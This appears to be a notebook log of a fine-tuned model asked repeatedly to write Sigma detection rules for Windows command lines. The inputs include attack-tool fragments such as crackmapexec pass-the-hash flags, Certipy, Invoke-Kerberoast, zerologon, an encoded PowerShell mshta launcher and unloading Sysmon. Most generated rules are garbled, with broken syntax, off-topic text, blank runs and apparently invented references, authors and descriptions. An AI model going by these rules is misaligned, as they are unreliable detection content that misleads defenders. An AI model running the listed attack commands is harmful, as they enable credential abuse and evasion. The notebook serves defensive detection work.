Input: \dsquery.exe dsquery.exe trustedDomain
Output:
{
    "dsquery.exe": {
        "process": {
            "parent": {
                "process": {
                    "parent": {
                        "command_line": "\"dsquery.exe\" trustedDomain",
                        "name": "dsquery.exe",
                        "parent": {
                            "name": "dsquery.exe"
                        },
                        "original_file_name": "dsquery.exe",
                        "pid": 3872,
                        "ppid": 636,
             

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\DXCap.exe DXCap.exe -c

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\DXCap.exe DXCap.exe -c

### Response:
Input: \DXCap.exe DXcap.exe -c
Title: HackTool - Dxcap Execution
Description: Detects execution of DXCap, a tool used by hackers to capture screenshots
References:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6053a6333315df374766a8a81b/atomics/T1567.002/T1567.002.md
Author: '@n3k0'
Date: 2021-08-06
Modified: 2022-03-03
Tags:
    - Attack.DefenseEvasion
    - Attack.Execution
    - Attack.T1124
    - Attack.T1124.001
LogSource:
    Product: 'DXcap'
    DataType: 'process_creation'
    OldFields:
        - Image
        - OriginalFileName
    NewFields:
        - Image
        - Name
        - CommandLine
        - User
        - LogonId
Status: test
Modified: 2024-01-22
Tags:
    - Attack.DefenseEvasion
    - Attack.Execution
    - Attack.T1124
    - Attack.T1124.001
    - Attack.T1124.002
    - T1124.002
    - T1124.001
    - SplunkEnterprise
    - SplunkEnt

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
esentutl /p

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
esentutl /p

### Response:
For example, if we want to find the file that was opened with the command we could do this:

```
process where process_name:\"\esentutl.exe\" AND command_line: /p
```

which would give us the file path in the command line:

```
for file in (search process where process_name:\"\esentutl.exe\" AND command_line: /p type:process) {
    input = file.command_line.split("\"")[1]
    search file where command_line:*{input} type:process
}
```

### Detection:

These rules detect when an unknown utility that runs as the SYSTEM account was spawned by esentutl.exe which is used by Microsoft SQL Server to backup and restore databases




## Atomic Tests

- Additional file: get_system_path.ps1

Input: \Esentutl.exe (from the system path)
id: 2f61962b-8572-43e7-8219-b5290872f085
status: test
description: Detects an unknown utility that runs as SYSTEM spawning esentutl.exe. This is commonly used by Microsoft SQL

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe \\powershell.exe \\pwsh.exe \\explorer.exe shell:mycomputerfolder

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe \powershell.exe \pwsh.exe \explorer.exe shell:mycomputerfolder

### Response:
Input: \cmd.exe \powershell.exe \pwsh.exe \explorer.exe shell:mycomputerfolder
Title: File Explorer Location Accessed Via Shell Folder
id: 5eb00394-43d1-4e74-926e-09270680f5a1
status: test
description: Detects the creation of a symbolic link pointing to a folder in the file explorer shell namespace.
references:
    - https://twitter.com/JP_Hoops/status/1289595223474155779
author: Florian Roth (Nextron Systems)
date: 2020-08-06
tags:
    - attack.execution
    - attack.persistence
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\explorer.exe'
        CommandLine:
            -'shell:'
    condition: all of selection
falsepositives:
    - Unknown
level: medium

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
findstr findstr.exe FINDSTR.EXE -v -l \\\\\\\\

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
findstr findstr.exe FINDSTR.EXE -v -l \\\\

### Response:
title: Hacktool - Findstr.exe
id: 31f14b72-f751-4d75-8990-5d8c4e092026
status: test
description: Detects the use of findstr.exe, which is often used to search for files containing a specific string, and can also be used as a basic network port scanner.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd344070550bf65dd3/atomics/T1059/T1059.md#t1059-logon-script
    - https://eqllib.readthedocs.io/en/latest/analytics/45f20a78-8e35-4a0e-969f-11d30f971b52.html
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Findstr/
author: frack113
date: 2021-12-15
modified: 2022-10-09
tags:
    - attack.discovery
    - attack.t1059.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\findstr.exe'
        OriginalFileName: 'findstr.exe'
        CommandLine|contains

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
findstr findstr.exe FINDSTR.EXE -s -i

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
findstr findstr.exe FINDSTR.EXE -s -i

### Response:
Analyze suspicious parent process.

Original Research:
Timur Yunusov,  #Nextron Systems

### Notes:
* T 1218.004 - 1st Stage - Rename and Move
* T 1218.006 - 2nd Stage - Execute
* T 1218.007 - 3rd Stage - Revert

### Queries:
#### OS Query:
Input:
select P.Name, P.Parent, P.Path, P.Extension, P.CommandLine,
    P.ParentCommandLine, P.ImagePath, P.Image,
    P.ParentImage, P.ParentImagePath,
    P.ParentImageName, P.ParentParentImage,
    P.ParentParentImagePath, P.OriginalFileName,
    P.ParentOriginalFileName, P.ParentParentOriginalFileName,
    P.ParentParentParentOriginalFileName, P.ServiceName,
    P.ParentServiceName, P.ParentParentServiceName,
    P.ParentParentParentServiceName, P.ParentParentParentParentServiceName,
    P.ProcessGuid, P.ParentProcessGuid, P from
    (
    select * from Processes where ProcessId in (select ParentProcessId from Processes)
    ) as

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
finger.exe \\finger.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
finger.exe \finger.exe

### Response:
Input: \finger.exe
title: File Name Containing Finger.EXE
id: f1c7f73f-6b7d-4b61-8f7a-843136592575
status: test
description: Detects the execution of finger.exe based on commandline
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3440e66e009cda90/atomics/T1033/T1033.md#atomic-test-2---finger-exe-execution
author: frack113
date: 2022-02-12
modified: 2022-03-04
tags:
    - attack.discovery
    - attack.t1033
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'finger.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium





































    # Invoke-Obfuscation via finger.exe
    -Command: 'finger.exe'
    -Args:
        -c:
        -i:
        -I:
    -Description: Detects the execution of finger.exe based on commandline
 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\fltMC.exe fltMC.exe unload sysmon

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\fltMC.exe fltMC.exe unload sysmon

### Response:
Unexpected Unload or Sysmon Unload
id: e0520bf2-d18f-4447-8c1c-959250151c45
status: test
description: Detects unexpected unload of a driver or sysmon.exe stopping
references:
    - https://www.mandiant.com/resources/blog/unusual-child-abuse
    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
    - https://github.com/pcmacdon/fltmc
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-29
tags:
    - attack.defense-evasion
    - attack.t1562.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'fltMC.exe'
        CommandLine|contains: 'unload'
        CommandLine|contains:'sysmon'
        CommandLine|contains:'stop'
    condition: selection
falsepositives:
    - Unrelated processes
level: medium


























































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\forfiles.exe forfiles.exe -c

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\forfiles.exe forfiles.exe -c

### Response:
forfiles.exe -c

Input:
title: Forfiles Execution
id: 7388c970-38e5-4704-8647-d7a2156430c1
status: test
description: Detects forfiles execution
references:
    - https://twitter.com/SBousseaden/status/1472547214525775360
    - https://eqllib.readthedocs.io/en/latest/analytics/2496d00d-c216-4e1f-874b-66a788584fcb.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-09
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\forfiles.exe'
        CommandLine|contains: '-c '
    condition: selection
falsepositives:
    - Unknown
level: medium



































    # CommandLine|contains: '"-c"'
    # CommandLine|contains: '"-c"'
    # CommandLine|contains: '"c"'
    # CommandLine|contains: '"c"'


































    # Original
    # Image|endswit

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\format.com /fs: /fs:exFAT /fs:FAT /fs:NTFS /fs:ReFS /fs:UDF

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\format.com /fs: /fs:exFAT /fs:FAT /fs:NTFS /fs:ReFS /fs:UDF

### Response:
Input: \fsutil.exe fsinfo drives
id: 27f6f318-056d-4439-96a2-42a8189edb0d
status: test
description: Detects Fsutil execution to query mounted drives
references:
    - https://twitter.com/sbousseaden/status/1351322177605735939
author: Florian Roth (Nextron Systems)
date: 2021-01-11
modified: 2022-11-29
tags:
    - attack.discovery
    - attack.execution
    - attack.t1083
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\fsutil.exe'
        - CommandLine|contains:
            - 'fsutil'
            - 'drives'
    condition: selection
falsepositives:
    - Unlikely
level: medium



```

















---











### Generated by bin/gen_lookups.rb







































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\fsutil.exe fsutil.exe drives

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\fsutil.exe fsutil.exe drives

### Response:
FSUtil.exe drives [drives]
fsutil.exe drives [drives]

### References:

### DSL:
FlattenDrives(
    name: 'FlattenDrives',
    author: 'Kevin T. Connor',
    description: 'Detects the use of FSUtil.exe to flatten all of the drives.',
    query: 'Select fsutil.exe Fsutil.exe drives from process_events limit 100000000
    where command_line like "%drives%" and original_file_name like "%fsutil.exe%"',
    example: 'datastax_agent.exe.\datastax_agent.exe -s -c 09b91805-4c58-444a-955f-41e5428763b3 -u "DataStax Agent" -p "datastax" -s -c 09b91805-4c58-444a-955f-41e5428763b3 -u "DataStax Agent" -p "datastax" -s',
    tags: ['attack.execution'],
    severity:'medium',
    falsepositives: ['Unknown'],
    related_commands: ['fsutil','drives'],
    logsource: [
        'process_creation_info',
        'file_event',
        'windows_event',
        'network_connection',
       'registry_e

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\fsutil.exe fsutil.exe behavior set SymlinkEvaluation

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\fsutil.exe fsutil.exe behavior set SymlinkEvaluation

### Response:
"UAC Bypass"
id: 6913bb4d-8106-4573-96c3-b2460c371669
status: test
description: Detects the usage of "fsutil" to disable the evaluation of the symlink
references:
    - https://web.archive.org/web/20170610170325/http://www.forensicswiki.org/wiki/Windows_UAC
    - https://lolbas-project.github.io/lolbas/UUSB/Fsutil/
author: @sbousseaden
date: 2019-06-28
modified: 2023-02-04
tags:
    - attack.defense-evasion
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'fsutil.exe behavior set'
    condition: selection
falsepositives:
    - Unknown
level: medium

```


### parse_script_data

| Key | Value |
| ----- | ----- |
| input | \fsutil.exe fsutil.exe behavior set SymlinkEvaluation |
| output | Unknown |
| description | Detects the usage of "fsut

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\fsutil.exe fsutil.exe deletejournal createjournal setZeroData

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\fsutil.exe fsutil.exe deletejournal createjournal setZeroData

### Response:
Input: \fsutil.exe fsutil.exe deletejournal createjournal setZeroData
Command: Fsutil.exe Fsutil.exe deletejournal createjournal setZeroData
Status: test
Description: Detects usage of Fsutil.exe to delete journal and create journal and setZeroData.
References:
    - https://twitter.com/BotnetStalker/status/1464924583803495682
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd31a0831caaafc699/atomics/T1485/T1485.md
Author: frack113
Date: 2022-03-17
Modified: 2023-02-25
Tags:
    - attack.impact
    - attack.t1485
    - attack.execution
    - attack.s0116
    - attack.t1070
    - attack.defense-evasion
Logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - fsutil.exe
            - deletejournal
            - createjournal
            - 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\ftp.exe \\ftp.exe ftp.exe -s:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\ftp.exe \ftp.exe ftp.exe -s:

### Response:
title: FTP Download Activity
id: 55a46940-8819-11eb-824c-0242ac120002
status: test
description: Detects the execution of "ftp.exe" with the "-s:" flag
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd344070500090cb9d/atomics/T1190/T1190.md
author: frack113
date: 2021-09-13
modified: 2023-02-04
tags:
    - attack.execution
    - attack.t1190
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'ftp.exe'
            - '-s:'
    condition: selection
falsepositives:
    - FTP download
    - Unknown
level: medium


---

### rule



```
_timeframe:
    duration: 30s

input:
    type: process_creation
    condition: selection













































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\GfxDownloadWrapper.exe http:// https:// https://gameplayapi.intel.com/

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\GfxDownloadWrapper.exe http:// https:// https://gameplayapi.intel.com/

### Response:
Input: \GfxDownloadWrapper.exe https:// https://gameplayapi.intel.com/ https://
id: 59611a30-d5f3-452e-9c30-c386f8717e75
status: test
description: Detects the execution of a GfxDownloadWrapper.exe child process in order to download files from a remote server
references:
    - https://twitter.com/m000ga/status/1506329717138824961
author: Florian Roth (Nextron Systems)
date: 2021-08-18
modified: 2022-05-27
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'GfxDownloadWrapper.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: selection
falsepositives:
    - Uncommon
level: medium









































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\gpresult.exe /z /v

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\gpresult.exe /z /v

### Response:
@echo Executing gpresult with /v and /z flags
gpresult.exe /v /z

### Notes:
This can be used to dump the GPOs configured on the system (when GPOs are configured). This can be useful to see what kind of permissions the user has (e.g. if they are an admin or a domain admin).
This can also be used to see the local security settings, which can be useful if the local admin's password is changed but the user still has access to the system.
This can be used to see the location of the system drive, which can be useful for mounting the drive via WMI from a different session.
The /z flag can be used to dump the full registry settings in a.reg file (useful to dump the full registry configuration).
The /v flag can be used to dump the full configuration in a.xml file (useful to dump the full configuration).

### References:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-co

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\GUP.exe gup.exe -unzipTo http \\notepad++.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\GUP.exe gup.exe -unzipTo http \notepad++.exe

### Response:
Not a real world example but shows how to combine commands
Input: \regsvr32.exe \mstsc.exe /control /f
title: PUA Regsvr32 RDP
id: 12c1c634-c628-4769-b07f-dd488a18b5c0
status: test
description: Detects use of the "regsvr32" command to register a DLL or a COM component.
references:
    - https://twitter.com/f0x_bl4ck/status/1386604131655140097
author: 'Markus Kuchel, @0xbl4ckborne, based on a rule by F0x_bl4ck'
date: 2020-11-27
tags:
    - attack.defense-evasion
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            -'regsvr32.exe'
            -'mstsc.exe'
        ControlFlags: 1
    condition: selection.ControlFlags & 1
falsepositives:
    - Uncommon software installations
    - Uncommon Windows updates
    - False positive on uncommon DLLs
level: medium

```



In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
HH.exe \\hh.exe .chm

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
HH.exe \hh.exe .chm

### Response:
input: Extensions of.exe and.chm
id: 5657a926-6f31-462b-b351-d8175707b1c2
status: test
description: Detects a hh.exe process spawned by a parent with a.chm extension
references:
    - https://www.microsoft.com/en-us/security/blog/2022/02/23/microsoft-threat-intelligence-analysis-finds-a-new-persistent-threat-actor-activity-in-china/
    - https://learn.microsoft.com/en-us/lifecycle/search/?alpha=hh.exe
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-28
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '.chm'
        Image|endswith: '.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
modul    Description: Detects a hh.exe process spawned by a parent with a.chm extension
    Recommendation: Monitor the activity of this process
    Seve

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
HH.exe \\hh.exe http:// https:// \\\\\\\\

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
HH.exe \hh.exe http:// https:// \\\\

### Response:
Input: \\\\share_name\path_on_share share_name path_on_share
id: 76d0f7e4-05a1-4d45-8f0f-454c573d6e5f
status: test
description: Detects a process accessing a shared path on a remote machine.
references:
    - https://twitter.com/SBousseaden/status/1325694834444841729
    - https://www.blackhillsinfosec.com/attack-in-depth-infoblox-ddos-to-ddns-campaign/
    - https://www.infosecinstitute.com/blog/infoblox-ddos-to-ddns-campaign/
    - https://github.com/Infoblox/Infoblox-DDOS-to-DDNS-Campaign/
    - https://www.symantec.com/content/dam/symantec-docs/en-us/pdfs/white-papers/Infoblox-DDoS-to-DDNS-Campaign-WP.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-11-05
modified: 2023-10-23
tags:
    - attack.execution
    - attack.lateral-movement
    - attack.persistence
logsource:
    category: process_creation
    product: windows
detection:
    selection:
     

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\hh.exe \\CertReq.exe \\CertUtil.exe \\cmd.exe \\cscript.exe \\installutil.exe \\MSbuild.exe \\MSHTA.EXE \\msiexec.exe \\powershell.exe \\pwsh.exe \\regsvr32.exe \\rundll32.exe \\schtasks.exe \\wmic.exe \\wscript.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\hh.exe \CertReq.exe \CertUtil.exe \cmd.exe \cscript.exe \installutil.exe \MSbuild.exe \MSHTA.EXE \msiexec.exe \powershell.exe \pwsh.exe \regsvr32.exe \rundll32.exe \schtasks.exe \wmic.exe \wscript.exe

### Response:
Input command line arguments for the selected executable.

### Note:
This rule will only work if the selected executable supports passing arguments to it.

### References:
https://www.elastic.co/guide/en/security/current/detecting-unwanted-children-process.html
https://www.elastic.co/guide/en/security/current/detecting-powershell-children-processes.html
https://github. /*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://github./*git*/hub.com/Neo23x0/RogueKiller
https://git

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
--adcs --port

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
--adcs --port

### Response:
Input: --port 1234 4321 1234 3456
Response: adcs.exe service.exe service.exe -p 1234 4321 1234 3456
id: d2f86d12-b127-4c0e-a412-00b102c2a961
status: test
description: Detects the execution of ADCS.EXE with the "service" flag in order to spawn an arbitrary binary as a child process.
references:
    - https://twitter.com/sagat2009/status/1425742055322218753?s=20
    - https://twitter.com/sagat2009/status/1425742055322218753?s=20
author: Florian Roth (Nextron Systems)
date: 2021-08-16
modified: 2022-10-13
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\adcs.exe'
        CommandLine:'service.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium




























































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
rundll32.exe .dll StartNodeRelay

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
rundll32.exe .dll StartNodeRelay

### Response:
@mmm.dll StartNodeRelay

### Note:
The default behavior of "rundll32" is to execute the specified DLL. In this case, we want to execute the specified DLL and start the process called "StartNodeRelay"


## Detection:
Create boolean function called "IsNodeRelayExecutable" with input "Rundll32.exe" as follows:

Input: Rundll32.exe
id: c41c44d2-8402-443b-8f4c-4b098086f594
status: test
description: Detects the execution of a DLL that starts the "StartNodeRelay" process, which indicates that the DLL was used to start a node relay
references:
    - https://app.any.run/tasks/d6710886-4e87-459f-950f-c872f51851d5/
    - https://www.microsoft.com/security/blog/2022/04/26/hunting-for-node-related-intrusions-and-compromises-in-windows/
    - https://blog.talosintelligence.com/2021/04/cryptomining-round-up-march-2021.html
    - https://eqllib.readthedocs.io/en/latest/analytics/57470d7f-48

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\Certify.exe Certify.exe Certify .exe cas .exe find .exe pkiobjects .exe request .exe download /vulnerable /template: /altname: /domain: /path: /ca:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\Certify.exe Certify.exe Certify .exe cas .exe find .exe pkiobjects .exe request .exe download /vulnerable /template: /altname: /domain: /path: /ca:

### Response:
use: pEtlPe
rename: certify
references:
    - https://app.sophos.com/en-us/blogs/2022/03/02/intelligence-alert-on-certify-exe-threat-actor-ghostcat
    - https://threatstream.com/blog/ghostcat-certify-exe/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-08
tags:
    - attack.execution
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\Certify.exe'
        CommandLine|contains:
            - '/vulnerable'
            - '/template:'
            - '/altname:'
            - '/domain:'
            - '/path:'
            - '/ca:'
    condition: all of selection
falsepositives:
    - Unlikely
level: medium
status: test
description: Detects usage o

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\Certipy.exe Certipy.exe Certipy account auth cert find forge ptt relay req shadow template -bloodhound -ca-pfx -dc-ip -kirbi -old-bloodhound -pfx -target -template -username -vulnerable auth -pfx shadow auto shadow list

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\Certipy.exe Certipy.exe Certipy account auth cert find forge ptt relay req shadow template -bloodhound -ca-pfx -dc-ip -kirbi -old-bloodhound -pfx -target -template -username -vulnerable auth -pfx shadow auto shadow list

### Response:
@dl_ref: https://github.com/OffsecOddball/Certipy
author: Nasreddine Bencherchali (OffsecOddball)
status: test
description: |
    Certipy is a tool used to manipulate Kerberos TGTs with certificates and to automate the process of authentication with these certificates.
    This can be used for privilege escalation, such as using Certipy to authenticate to a server that has not configured delegation on the certificate used.
references:
    - https://github.com/OffsecOddball/Certipy
    - https://www.youtube.com/watch?v=m3f42t-sHbI
    - https://www.sans.org/cyber-security-summit/archives/file/summit-archive-pdfs/2020/Summit2020-On_Cyber_Threats_To_Human_Life-_Session_2.143176763.pdf
    - ht

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
Cmd.Exe \\cmd.exe Invoke-UserHunter Invoke-ShareFinder Invoke-Kerberoast Invoke-SMBAutoBrute Invoke-Nightmare zerologon av_query

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
Cmd.Exe \cmd.exe Invoke-UserHunter Invoke-ShareFinder Invoke-Kerberoast Invoke-SMBAutoBrute Invoke-Nightmare zerologon av_query

### Response:
An adversary may use legitimate applications to proxy activity, which may include file uploads or downloads.
For example, adversaries have used legitimate Microsoft applications such as Skype, OneDrive, and others to proxy activity.
Adversaries may also use legitimate applications to move laterally within an environment,
such as Microsoft applications such as Outlook, browsers, and others.
Adversaries may also use legitimate applications to deliver the adversary and/or component software to the target host.
These legitimate applications could include Office, Adobe, GoToMeeting, browsers, and others.

Adversaries may use legitimate applications to collect information about an organization.
This may include specific information regarding users and systems, or information regarding ot

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-Sta -Nop -Window Hidden -Command -EncodedCommand sv o (New-Object IO.MemorySteam);sv d mshta file.hta GruntHTTP -EncodedCommand cwB2ACAAbwAgA

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-Sta -Nop -Window Hidden -Command -EncodedCommand sv o (New-Object IO.MemorySteam);sv d mshta file.hta GruntHTTP -EncodedCommand cwB2ACAAbwAgA

### Response:
title: Powershell Downloader Via Mshta
id: 3141f729-8b75-409a-946d-726c4d0611e0
status: test
description: Detects the execution of a PowerShell script by using Mshta to spawn a PowerShell process to download the script content
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Mshta/
    - https://twitter.com/0gtweet/status/1165508001788544256
    - https://eqllib.readthedocs.io/en/latest/analytics/a949f620-4060-4061-ab0b-b6004242979d.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-09-12
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            -'mshta'
            -'sv'
            - 'd'
 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\crackmapexec.exe -M pe_inject --local-auth -u -x --local-auth -u -p -H 'NTHASH' mssql -u -p -M -d smb -u -H -M -o smb -u -p --local-auth --local-auth -u -p 10. 192.168. /24

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\crackmapexec.exe -M pe_inject --local-auth -u -x --local-auth -u -p -H 'NTHASH' mssql -u -p -M -d smb -u -H -M -o smb -u -p --local-auth --local-auth -u -p 10. 192.168. /24

### Response:
For this example, we can see that the crackmapexec is used to enumerate active directory.
We can see that the credentials used for this enumeration are "Admin"/"P@ssw0rd"

It's possible to see all the flags of crackmapexec here: https://github.com/crackmapexec/crackmapexec

### Notes:
The flag "--local-auth" is used to bypass domain trust restrictions.

### Detection:
Selection | Content
